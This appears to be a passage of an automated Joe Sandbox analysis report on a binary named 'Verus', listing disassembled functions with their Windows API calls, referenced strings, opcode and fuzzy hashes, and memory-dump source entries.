API String ID: 3447690668-2249357856
Opcode ID: 42beb9a8a8fbbd007d3bdcc355a8198781eb8718d9d2d929c505beef4dc4e3be
Instruction ID: e8c624cbf5512a909fc07ef6ad0b8207b3b9928bf25c2e69e7595cbdfd39c481
Opcode Fuzzy Hash: 42beb9a8a8fbbd007d3bdcc355a8198781eb8718d9d2d929c505beef4dc4e3be
Instruction Fuzzy Hash: B0410BB1E002099FCB04DF99D881AAFB7B5FB88714F20852AE915A73D1D638AD41CB94

Function 00445080 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

SHGetDesktopFolder.SHELL32(?), ref: 004450F7
DoDragDrop.OLE32(00000000,00000000,00000001,?), ref: 004451B2

Strings

:, xrefs: 0044511F

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: DesktopDragDropFolder
String ID: :
API String ID: 2056485083-336475711
Opcode ID: 44d799f1cefa1ada87d8b16800dbafb2030fa20ec6339d459c9d16259b3c46d3
Instruction ID: 5e6be34211a739143334749d013a6904b43e9a2d2b74c57cd8097f6fe4610dfb
Opcode Fuzzy Hash: 44d799f1cefa1ada87d8b16800dbafb2030fa20ec6339d459c9d16259b3c46d3
Instruction Fuzzy Hash: F741C271608741AFE724DF65D845BABB7E4EBC8710F004A2EF459873C1DB78A904CB96

Function 00456370 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(?), ref: 004563D1
_memset.LIBCMT ref: 004563FC

Strings

X{D, xrefs: 004563C5

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Malloc_memset
String ID: X{D
API String ID: 3937743083-546603950
Opcode ID: 09c63166d8d0fdd53c753fcdc433e375f869035080f646b850467cb613d33d55
Instruction ID: 8ff72cc8fa30f33996514a8341cc946a9e431ebc667b5c54fc3ccd0713e4b7a3
Opcode Fuzzy Hash: 09c63166d8d0fdd53c753fcdc433e375f869035080f646b850467cb613d33d55
Instruction Fuzzy Hash: 2921E2763012125BD710DE59DC40A7BB3E8AFD5796B55452EFC80C7241EB28DC09C774

Function 0042C4A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0042C4DE

Strings

F, xrefs: 0042C51A
H, xrefs: 0042C528

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: _memset
String ID: F$H
API String ID: 2102423945-45678692
Opcode ID: 14b74fd3c0ba1c2545a2e9406b34e4f0ba71adee9affa6af4a94af331208d382
Instruction ID: 7d06eac963871796ccddd67aba7f20018136a0d2ed300480b369b9de35913d45
Opcode Fuzzy Hash: 14b74fd3c0ba1c2545a2e9406b34e4f0ba71adee9affa6af4a94af331208d382
Instruction Fuzzy Hash: DA21E2716083919ED300EB289452BAFBFD4ABDD714F44091FF5C997241E6648A088BA7

Function 0042C580 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0042C5B8

Strings

Z, xrefs: 0042C5E6
*, xrefs: 0042C5EB

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: _memset
String ID: *$Z
API String ID: 2102423945-2966242152
Opcode ID: fc1ae46cf46e42eec065ae8790635e8de0bbabe64c5310173efd6c5b31c4642f
Instruction ID: 679efe9862f9044992405d3b052960e1084c0dd43537dc59d52399303f348b46
Opcode Fuzzy Hash: fc1ae46cf46e42eec065ae8790635e8de0bbabe64c5310173efd6c5b31c4642f
Instruction Fuzzy Hash: 831196616183919ED710DB249401BAFBFD4AFD9314F440A1FE5D8A7241E2389609CBA7

Function 0046E830 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0046E869

Part of subcall function 0046E580: SendMessageW.USER32(?,0000113E), ref: 0046E5D4
Part of subcall function 0046E580: SendMessageW.USER32(00000000,0000113F,00000000,?), ref: 0046E5F0

SendMessageW.USER32(?,00001132,00000000,?), ref: 0046E8CE

Strings

g, xrefs: 0046E893

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$_memset
String ID: g
API String ID: 1515505866-30677878
Opcode ID: 78113ab205c9c76354f2210ae094734d927020ea2f0b7310c00ae93c2fc3c050
Instruction ID: e27d984e96000d17e4af3863ba85c762c915db14e1191a9ac039ecec9bb280ca
Opcode Fuzzy Hash: 78113ab205c9c76354f2210ae094734d927020ea2f0b7310c00ae93c2fc3c050
Instruction Fuzzy Hash: 44110AB1509341AFC390DF29C881A5BBBE4FBC9754F000A2EF698D7250E7719905CB96

Function 00436D99 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00436DB8
lstrcatW.KERNEL32(?,?), ref: 00436E05

Strings

%c:, xrefs: 00436DED

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: _memsetlstrcat
String ID: %c:
API String ID: 2348938477-1226554575
Opcode ID: efa176c53a7816ae880949e358fcfc9123f55892df26a62a9f395c4e8fe3a5a0
Instruction ID: 9b75152458850ced5d16d2a67bdd53527039f51ebdcbc94a8c7d663f8a63e434
Opcode Fuzzy Hash: efa176c53a7816ae880949e358fcfc9123f55892df26a62a9f395c4e8fe3a5a0
Instruction Fuzzy Hash: D5118C797007019BCA21DB60E843BDBB394EF8C308F40491FE55543180D738E249CB9A

Function 004200E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

SetDlgItemTextW.USER32(?,00000453,?), ref: 0042012F
SetDlgItemTextW.USER32(?,00000455,?), ref: 00420154

Strings

config, xrefs: 004200F5

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ItemText
String ID: config
API String ID: 3367045223-3565825916
Opcode ID: a2ce8ad434144badf7c235c7e8f194a881b3aecc50d75fd8fe2fdb7d5ee18973
Instruction ID: 6d62410dd7a1ff57496c281c2d033e6781ceac3457eb0b96f8758474fd48eba9
Opcode Fuzzy Hash: a2ce8ad434144badf7c235c7e8f194a881b3aecc50d75fd8fe2fdb7d5ee18973
Instruction Fuzzy Hash: 8501D6BA3406106F9A149F44EC91EBB639ADBC4725F11C14FFB055F383DA749C0287A8

Function 004BE3C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 004BE401
GetTempFileNameW.KERNEL32(?,tmp,00000000,?), ref: 004BE41C

Strings

tmp, xrefs: 004BE410

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: tmp
API String ID: 3285503233-753892680
Opcode ID: d0b69b05e3249b172853df549f95877c43606e4dca1ab88a775afd55d8e56419
Instruction ID: a784e352582345c84dbb451c5620c725655144cefaac87e181386c568560c6f5
Opcode Fuzzy Hash: d0b69b05e3249b172853df549f95877c43606e4dca1ab88a775afd55d8e56419
Instruction Fuzzy Hash: 7E1151B5A00218ABCB14DF51CC45FEDB7B4EB48714F4046AEF61A57280DB746A44CF58

Function 00478830 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00478878

Part of subcall function 004919DD: _malloc.LIBCMT ref: 004919F7

lstrcpyW.KERNEL32(?,Root,?,?,?,?,?,?,?,004C046B,000000FF), ref: 004788B0

Strings

Root, xrefs: 004788AA

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: _malloc_memsetlstrcpy
String ID: Root
API String ID: 517628105-3066451557
Opcode ID: 11df43858308d94b24b8c6a10f6325983d76d2c8247bb36e6b171ac9019418f3
Instruction ID: 2211322ba59879ac464936ea1dd1e678f7e362cb2083ac2c0f89480cc7ae97e1
Opcode Fuzzy Hash: 11df43858308d94b24b8c6a10f6325983d76d2c8247bb36e6b171ac9019418f3
Instruction Fuzzy Hash: A2111BB5644701AFD3A0DF28C942B97BBE4FF48710F10892EB599C3390EB78A444CB96

Function 0046E580 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000113E), ref: 0046E5D4
SendMessageW.USER32(00000000,0000113F,00000000,?), ref: 0046E5F0

Strings

@, xrefs: 0046E5C4

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend
String ID: @
API String ID: 3850602802-2766056989
Opcode ID: 2eafe009071c420626b12797b7e1f9f118d524d9d679c6dd095a0044ef564149
Instruction ID: 537b1c2275d6272bc7ad4b3e96fff0965213a8c862b9938145e24baa1fd46dc6
Opcode Fuzzy Hash: 2eafe009071c420626b12797b7e1f9f118d524d9d679c6dd095a0044ef564149
Instruction Fuzzy Hash: C00113B1908301AFC380DF29C880A9BFBE4AFCC710F004A2EF588D7244E3709A448F92

Function 00448041 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000410,00000002,00000000,?,A2004C45), ref: 0044806A
SendMessageW.USER32(?,00000423,00000000,?,A2004C45), ref: 00448076

Part of subcall function 00446A40: GetClientRect.USER32 ref: 00446A65
Part of subcall function 00446A40: SetWindowPos.USER32(?,00000000,00000000,?,00000000,?,00000014), ref: 00446AA0

Strings

(N, xrefs: 00448041

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$ClientRectWindow
String ID: (N
API String ID: 1117068668-3078801401
Opcode ID: 23d9e0aeb6df10b2f6d93ee4f66dd6ca9b43eecb4782f79afcf709954e85e60a
Instruction ID: 16cfba50faf0df70a075b6deb682839861ae6732b622bf2482afcde1959ef9d8
Opcode Fuzzy Hash: 23d9e0aeb6df10b2f6d93ee4f66dd6ca9b43eecb4782f79afcf709954e85e60a
Instruction Fuzzy Hash: CBF0E2B23487813FF311A772AC92F6B66C89B88B04F00881EF6829B5C3C5D8B950931D

Function 0044D1E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004485C0: ShowWindow.USER32(?,00000001), ref: 004485E7
Part of subcall function 004485C0: GetWindowLongW.USER32(?,000000F0), ref: 004485F5
Part of subcall function 004485C0: SetWindowLongW.USER32(?,000000F0,00000000), ref: 00448610
Part of subcall function 004485C0: GetWindowLongW.USER32(?,000000F0), ref: 00448618
Part of subcall function 004485C0: SetWindowLongW.USER32(?,000000F0,00000000), ref: 0044862D
Part of subcall function 004485C0: IsWindowVisible.USER32(?), ref: 0044864F
Part of subcall function 004485C0: ShowWindow.USER32(?,00000005), ref: 0044865B
Part of subcall function 004485C0: ShowWindow.USER32(?,00000000), ref: 00448662
Part of subcall function 004485C0: IsWindowVisible.USER32 ref: 0044868D
Part of subcall function 004485C0: ShowWindow.USER32(?,00000005,?,?,00000000), ref: 00448698
Part of subcall function 004485C0: ShowWindow.USER32(?,00000000,?,?,00000000), ref: 004486A1
Part of subcall function 004485C0: GetWindowRect.USER32(?,004EE92C), ref: 004486BE

lstrcpyW.KERNEL32(?,FeyWriter), ref: 0044D20D
SetWindowTextW.USER32(?,?), ref: 0044D21C

Part of subcall function 0045B570: ShowWindow.USER32(?,00000005,?,004EDE74), ref: 0045B5B0
Part of subcall function 0045B570: SendMessageW.USER32(?,00001101,00000000,FFFF0000), ref: 0045B5E7
Part of subcall function 0045B570: SendMessageW.USER32(?,00001009,00000000,00000000), ref: 0045B5FC
Part of subcall function 0045B570: GetLocalTime.KERNEL32(?,?,004EDE74), ref: 0045B627
Part of subcall function 0045B570: GetDateFormatW.KERNEL32(00000400,00000000,?,yyMMdd_,?,00000008), ref: 0045B645

Strings

FeyWriter, xrefs: 0044D203

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Window$Show$Long$MessageSendVisible$DateFormatLocalRectTextTimelstrcpy
String ID: FeyWriter
API String ID: 1597244904-2343840019
Opcode ID: 6f6e204d9f94aff77306be02529aef089d3a49d5efa0ace386a58273b4a8cc45
Instruction ID: 4bd5b361c373b3854150f0b9da672b12474ed2a3ebf7d4d38eadff20f89d9d9f
Opcode Fuzzy Hash: 6f6e204d9f94aff77306be02529aef089d3a49d5efa0ace386a58273b4a8cc45
Instruction Fuzzy Hash: C8F0C8B06003406FD714EB70D916B6B37E4AF88348F00492EF9428B291EB79E8048B4D

Function 00406ED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

std::bad_exception::bad_exception.LIBCMTD ref: 00406F10

Part of subcall function 00402A30: std::runtime_error::runtime_error.LIBCPMTD ref: 00402A3E

__CxxThrowException@8.LIBCMT ref: 00406F1E

Part of subcall function 00491365: RaiseException.KERNEL32(?,?,00491A41,004024C5,?,?,?,?,00491A41,004024C5,004E76D0,0053A2B8,004024C5,00000000,00000000), ref: 004913A7

Strings

vector<T> too long, xrefs: 00406EF5

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowstd::bad_exception::bad_exceptionstd::runtime_error::runtime_error
String ID: vector<T> too long
API String ID: 212174158-3788999226
Opcode ID: 6342161abdfaa11b8f843c31a690304341b91022845188135bb303ee230317f4
Instruction ID: 2de13b0c04af427d3334adad94b94fc9835a6e93b67cc8147ecc1ed65f2ffae8
Opcode Fuzzy Hash: 6342161abdfaa11b8f843c31a690304341b91022845188135bb303ee230317f4
Instruction Fuzzy Hash: 11F0AF71904248ABCB10EFD1CD42F9EB7B8FB00720F10062EB411676D0DF786A04CB48

Function 0044D170 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004485C0: ShowWindow.USER32(?,00000001), ref: 004485E7
Part of subcall function 004485C0: GetWindowLongW.USER32(?,000000F0), ref: 004485F5
Part of subcall function 004485C0: SetWindowLongW.USER32(?,000000F0,00000000), ref: 00448610
Part of subcall function 004485C0: GetWindowLongW.USER32(?,000000F0), ref: 00448618
Part of subcall function 004485C0: SetWindowLongW.USER32(?,000000F0,00000000), ref: 0044862D
Part of subcall function 004485C0: IsWindowVisible.USER32(?), ref: 0044864F
Part of subcall function 004485C0: ShowWindow.USER32(?,00000005), ref: 0044865B
Part of subcall function 004485C0: ShowWindow.USER32(?,00000000), ref: 00448662
Part of subcall function 004485C0: IsWindowVisible.USER32 ref: 0044868D
Part of subcall function 004485C0: ShowWindow.USER32(?,00000005,?,?,00000000), ref: 00448698
Part of subcall function 004485C0: ShowWindow.USER32(?,00000000,?,?,00000000), ref: 004486A1
Part of subcall function 004485C0: GetWindowRect.USER32(?,004EE92C), ref: 004486BE

lstrcpyW.KERNEL32(?,FeyWriter), ref: 0044D19D
SetWindowTextW.USER32(?,?), ref: 0044D1AC

Part of subcall function 0045B570: ShowWindow.USER32(?,00000005,?,004EDE74), ref: 0045B5B0
Part of subcall function 0045B570: SendMessageW.USER32(?,00001101,00000000,FFFF0000), ref: 0045B5E7
Part of subcall function 0045B570: SendMessageW.USER32(?,00001009,00000000,00000000), ref: 0045B5FC
Part of subcall function 0045B570: GetLocalTime.KERNEL32(?,?,004EDE74), ref: 0045B627
Part of subcall function 0045B570: GetDateFormatW.KERNEL32(00000400,00000000,?,yyMMdd_,?,00000008), ref: 0045B645

Strings

FeyWriter, xrefs: 0044D193

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
